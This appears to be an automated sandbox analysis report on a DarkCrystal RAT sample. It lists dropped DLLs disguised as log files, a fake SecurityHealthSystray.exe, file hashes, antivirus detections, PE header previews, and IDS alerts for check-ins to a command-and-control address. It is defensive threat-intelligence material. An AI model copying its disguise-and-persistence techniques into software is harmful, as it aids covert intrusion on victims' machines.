                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                    C:\Users\user\Desktop\PDlWdMMS.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):85504
                                                    Entropy (8bit):5.8769270258874755
                                                    Encrypted:false
                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                    C:\Users\user\Desktop\YPnuykix.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):32256
                                                    Entropy (8bit):5.631194486392901
                                                    Encrypted:false
                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                    C:\Users\user\Desktop\c397ed2d1437c4

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with very long lines (652), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):652
                                                    Entropy (8bit):5.866145229900589
                                                    Encrypted:false
                                                    SSDEEP:12:yQBPpBWTMGckTQQHy5AYnVHBtGmW/0QYT1xJ5Fp9U5gK1TrezR0:yQNS6kTkTVHBtLW8DjXFp6l1TKR0
                                                    MD5:1B11DF9C72C40FD49F82A05D1002AD87
                                                    SHA1:590722226D520034A8FC0115D930D6D9A5E758F9
                                                    SHA-256:BEB50F81A4CECB61869AF5A72BE431C5E991B93DCA8F73CDD263D7A419743B70
                                                    SHA-512:2C574AFCC21159DD10BE8DBDF3D6D090C9D7C67BCBF7EB9386444B41F12A99473107EC06522CA6ABDABDA67113B70C4EA49C1C6F676E0E08B02E7B8CABE3229B
                                                    Malicious:false
                                                    Preview:6IMoyNe5UJ2LppuANndxD5pIagw8oXnYRNGN7B3lpetaR6nd813K5dkAcEOSagQ6fd3cjhCLt1HiMP0d2SAwecdymGu3xlLJOw4xDL4bysbDVCxNNvaIgdcCAEzcwJYIq8UZUDZqXj8vBackSgpCKCmuU1x8WcopUSWXsY3KVuv7fqBklOKQdV8oVkFcPaT54SbsDF24nfraQpOn0NXHRYL8UsBHSa44a0CNPSggWPn8oiXpWclCDMngHdYVDumMlw9anBYir0uBvNUwUWv0y21NNfFw3KcmnaX2i6CUEDVMblv3ImAr8wXs4wNH5mogYIXU0bOXTavvhowluMnRKvn1Do7vt4ZbYyySNbDrXnXhAmLP9lXs9XVmegRLdcoYAUWs0dYSI53hXG1acswHhrcAdLxrJ1N588gpPdZfNEkDeyOYo0svpg1T1VPoqrIQs7iYjLL9SQ4dGZgo7YDTIbPcHMy3Nuzg5TUgQzzcotcZlYNczlrRnzIQrFRWXSwhbYhxE9XHjloZ900t9WDmDh2GLEyLicEW747N0ZXzNkrCKsR1PhXBOJe3gbm9LMiHgScE2n2j8OYd0z5dx75BEDHxaErZxYoBBkg1PM9moxCAuADrfJMOQhCdKpnx6dvkjXbPSENk8TWQ

                                                    C:\Users\user\Desktop\jjSkKJFG.log

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):69632
                                                    Entropy (8bit):5.932541123129161
                                                    Encrypted:false
                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                    C:\Users\user\Desktop\rUKsZmvt.log

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):85504
                                                    Entropy (8bit):5.8769270258874755
                                                    Encrypted:false
                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                    C:\Users\user\Desktop\wlyrJHCD.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):23552
                                                    Entropy (8bit):5.519109060441589
                                                    Encrypted:false
                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                    C:\Windows\BitLockerDiscoveryVolumeContents\b83e72d5c7bd2d

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with very long lines (415), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):415
                                                    Entropy (8bit):5.8325624456582155
                                                    Encrypted:false
                                                    SSDEEP:12:3C/5kndndfhlk06ivQySP1aRTsZXdAYeZRIJ:XndndA06QQyqSQFevY
                                                    MD5:65D0F4B9D7197D520D51E71C163593F6
                                                    SHA1:9DFE10EFC3ECEA18C016374B2FBD11079AD43EAA
                                                    SHA-256:E2927C9DB71F744188D22E826363A733B94116677BC7DAE477247729A31D36E6
                                                    SHA-512:42C62E352A693FB08C5E471F4D70B934E8F15CA359D54344DC37085A2E078E339A091A5CC0C34B7F765114CEDB608F2EF4111C304BBE659A772BA6C1E338C617
                                                    Malicious:false
                                                    Preview:1o4tyoamme3AiaDnngkKZCybURY7de0nn9h2KPykFNtUoFJtT0Swe29yzcYgPcIIoQXj3KdXr9FLSewPHpnnLEIu9sDr1SUmFlqXsk0JX5EexyfVqJYkzf6jImjKHvgZpcGryYhhyeQQ9o7LMrBr3txkpGPFApBlYozUrygRl1wVOpkdpY7Ztyg5ogBsJbgIdo1UymdXLuGC7cVAfvamrl1kI3qLxyIJUn1kxPoC4jO9se8MKBMXB4a1wRM56SkWl6rTkuMQGXrIW12n5dAvmvIaNAxgDtGm92YwxolZz6QoMSf4Yi9cRzt0yQGk6pMXREIedG0Q1k6qedN4f3HeunVJIh8giBcJt2WIJAaSrslq3DVUDMEDisnot9V6IUs0Hw6lGFueczwBCoQELndV6ZkAPsYKpeK

                                                    C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1912832
                                                    Entropy (8bit):7.536317571621779
                                                    Encrypted:false
                                                    SSDEEP:49152:e+HfOkJKSCClPSW07CC7db1s8qOZcWe8mLP1:e+/PJK9Cj67vXmLd
                                                    MD5:6667F954763EEACF7EFFCF5A5C25E695
                                                    SHA1:6DB1FBA1CD1181B921CDADEBA24C69CD680BE825
                                                    SHA-256:62B1BF60394248D2C743EC6DF0935D58E5009C9E04AAB52DA72AD712A57597B4
                                                    SHA-512:9CC3525D7B7926CAA3017FFC91E3262429C74A03C9BE10037D1BF416EE7DE812D60E2B1AFD87DFE1D5B2ECE3A21CFC4CACD4E79F0152AECC3E421F1996599D20
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 73%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q}f.................(...........F... ...`....@.. ....................................@..................................F..K....`.. ............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc... ....`.......*..............@....reloc..............................@..B.................F......H.......0...x...............pj..-F.......................................0..........(.... ........8........E........N...*...)...8....(.... ....~j...{....:....& ....8....*(.... ....~j...{....:....& ....8....(.... ....~j...{v...:....& ....8y......0.......... ........8........E....;...........`...l...86...~....(C... .... .... ....s....~....(G....... ....8.......... ....~j...{....:....& ....8....r...ps....z*....~....(K...~....(O... ....?.... ....8O...~....:.... ....~j...{....91..

                                                    C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe:Zone.Identifier

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:false
                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                    C:\Windows\System32\CSC9D0BE8EB87641DFA2B4851BB05AFB2.TMP

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:MSVC .res
                                                    Category:dropped
                                                    Size (bytes):1224
                                                    Entropy (8bit):4.435108676655666
                                                    Encrypted:false
                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                    Malicious:false
                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                    C:\Windows\System32\SecurityHealthSystray.exe

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):4608
                                                    Entropy (8bit):3.9527336926822474
                                                    Encrypted:false
                                                    SSDEEP:48:6QpHPtVM7Jt8Bs3FJsdcV4MKe27BdxvqBHaOulajfqXSfbNtm:3PMPc+Vx9M1vkEcjRzNt
                                                    MD5:9DC83209265291CA0D61FF47F91EF4B8
                                                    SHA1:98C31EC5FEDAF9C7FB950BBF7A003E41AADF639C
                                                    SHA-256:BC8003D2321DC53E628892D127245BB55B97F86DA1AB5202F0A712F9C574C5B2
                                                    SHA-512:5AF55DD0393628677C2F124C7759B4AE06C231B802CAC42ABF4DC2D06239179DF7383963DE9472380C6EE6A2FFA4370E4793CDD5E4392C1D1CEB168360ED643A
                                                    Malicious:true
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q.f.............................'... ...@....@.. ....................................@.................................P'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..(.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                    \Device\Null

                                                    Download File
                                                    Process:C:\Windows\System32\w32tm.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):151
                                                    Entropy (8bit):4.758454230181024
                                                    Encrypted:false
                                                    SSDEEP:3:VLV993J+miJWEoJ8FXxX9RVDUmy6voGK8XKNvj:Vx993DEU2tRVDvGGk
                                                    MD5:65D28B404CF428B414F45E120C517360
                                                    SHA1:7CCE7561153827DD1C98B2F865C3410057A23D54
                                                    SHA-256:CCF0373F9B6D58CA9DB3D1AF833149E3A6BF149FA699F8F03EC8FF2E24B2E9DE
                                                    SHA-512:8DC88521A3D772D42843095EFEC4ED017A48933342CDC83D38D5CB59050C463A6F6EF7AF329E1C6949D4B46DF010BA941D8AA5A68754F56B24351AD6587F1D59
                                                    Malicious:false
                                                    Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 03/07/2024 11:44:11..11:44:11, error: 0x80072746.11:44:16, error: 0x80072746.

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.536317571621779
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File size:1'912'832 bytes
                                                    MD5:6667f954763eeacf7effcf5a5c25e695
                                                    SHA1:6db1fba1cd1181b921cdadeba24c69cd680be825
                                                    SHA256:62b1bf60394248d2c743ec6df0935d58e5009c9e04aab52da72ad712a57597b4
                                                    SHA512:9cc3525d7b7926caa3017ffc91e3262429c74a03c9be10037d1bf416ee7de812d60e2b1afd87dfe1d5b2ece3a21cfc4cacd4e79f0152aecc3e421f1996599d20
                                                    SSDEEP:49152:e+HfOkJKSCClPSW07CC7db1s8qOZcWe8mLP1:e+/PJK9Cj67vXmLd
                                                    TLSH:CD959D1659924E3BC3641B314497003D92D0CB376A66FF0F3A1F61E5AE43BB5CA721BA
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q}f.................(...........F... ...`....@.. ....................................@................................

                                                    File Icon

                                                    Icon Hash:90cececece8e8eb0

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x5d46fe
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x667D5113 [Thu Jun 27 11:46:27 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1d46b00x4b.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d60000x320.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d80000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x1d27040x1d2800c348f17490abd78a407642d0cb98f772False0.7776959614482851data7.539794011288274IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x1d60000x3200x4003720f37e3ecb95f78fcf18a649002524False0.3525390625data2.6537284131589467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .reloc0x1d80000xc0x20041e1aa82ccda9ea401b1860955233b34False0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_VERSION0x1d60580x2c8data0.46207865168539325

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    07/03/24-16:42:09.488839TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4970780192.168.2.10188.114.97.3
                                                    07/03/24-16:43:02.458952TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4978580192.168.2.10188.114.97.3
                                                    07/03/24-16:43:34.748698TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4983080192.168.2.10188.114.97.3

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
